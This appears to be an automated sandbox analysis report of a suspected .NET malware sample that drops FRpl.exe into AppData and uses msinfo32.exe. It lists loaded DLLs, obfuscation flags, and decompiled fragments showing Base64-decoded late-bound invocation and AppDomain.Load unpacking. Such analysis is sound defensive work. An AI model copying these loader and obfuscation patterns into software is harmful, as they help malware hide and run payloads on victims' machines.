Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs	.Net Code: _0b1xfX7peWpApjEZByfVu

Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Static PE information: section name: .xdata
Source: FRpl.exe.0.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002E7B74 push rbp; ret	0_2_002E7B75
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00292CE2 push E8000001h; retf	0_2_00292CE8
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00BB7B74 push rbp; ret	3_2_00BB7B75
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B62CE2 push E8000001h; retf	3_2_00B62CE8

Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, TZrzPbjLFFrbDwwIGB0vNnvCmpznQ3zQNtXcbMKKxJg5prbr8Zlj36BoaWOHWNOJCmMUgm8ceTkqecS30KecypXPUjNpn3nyL.cs	High entropy of concatenated method names: 'Nd3j5YRJl0k9D3V06qrWzS2GTqP43pOAoaKOU30fkWcvnMxLYjg4DD4FIhBPGiYkJowcVY6tf6quLPWMxXvJZGrg5huFQmX8T', 'y5qQJHJViSl5sI78N77ScXb8FrUOc5Xik3er6pZ', '_59Db4NilXSNjJDA0hNgSEoJ7a5A58VRaRPG2gba', 'EaS9LNVTXAsBeraG2Hj51MQSAH', '_37z0KAv5mkqEMe99iD5vvDKC9W', 'DuUdHU4JCBITGRNZwZIGhNQfMR', 'LsUUKIdDdQxQfn2Xa9XaVSGEkU', 'TTOGSCnm6JQXSXng6C5FLTImE7', 'PGcJwbPc188aoXAjUPu2cDrftm', 'PAyIhvojvsjSoRuKh8D9iqpi1R'
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, t8EoroTELBJo02OPzsY8s3nMCnSzvrepSobpfejBHOH6CmxDbazfhjFmufKk6S9itNTJx.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TN6mI57CI7qQPQQN', 'CEGlSs6jTnJlUo61', 'LJxnRx17l6VdZH7r', 'QMZVndWUk0mYLGDC'
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	High entropy of concatenated method names: 'QE1eP3w5bZYMc1CkK9DkU', '_1grTmSN1N8xDGNJc6Kmem', '_3gAAVqCSctZdKISq2n3HG', 'kU2ABuX205jRfDYWQK5a5', 'wBv5irAiNPf9wwZLIabZh', 'juHK2LPCAOMhEtJix3ng5', 'K7MqNdl5GfbGu0u3ZXwFy', 'CCD7rfTr1tkTaap5KtNyZ', 'PwSlJAXd5toapo8LEOXsh', 'rlvlkDkwl3jQStuXbMxnp'
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.cs	High entropy of concatenated method names: 'cBFcsrNxw006MB6507Xpw', '_5cc8tJbvdpF1gF83dUV9LAx5hY0EB8Zax1NISdkMbB9feR3l60b2NvWQ09wKf2amvQ', 'ywXk1J7Dy3wVB9POxn2a9CwTj67i7wDpzXBVbej80g7Dg0wxSlir6UwtbjOtwh01LU', 'WOaXxgL0KqKB1gBQYBSstKSMyN6Wsdi3ejoBTUyWCY6ssFKoRIHR', 'EBpYhJmki7M2gP5cmx05KTl5NsGEkRnfjmU1f05zr79eCkm1kmXp'
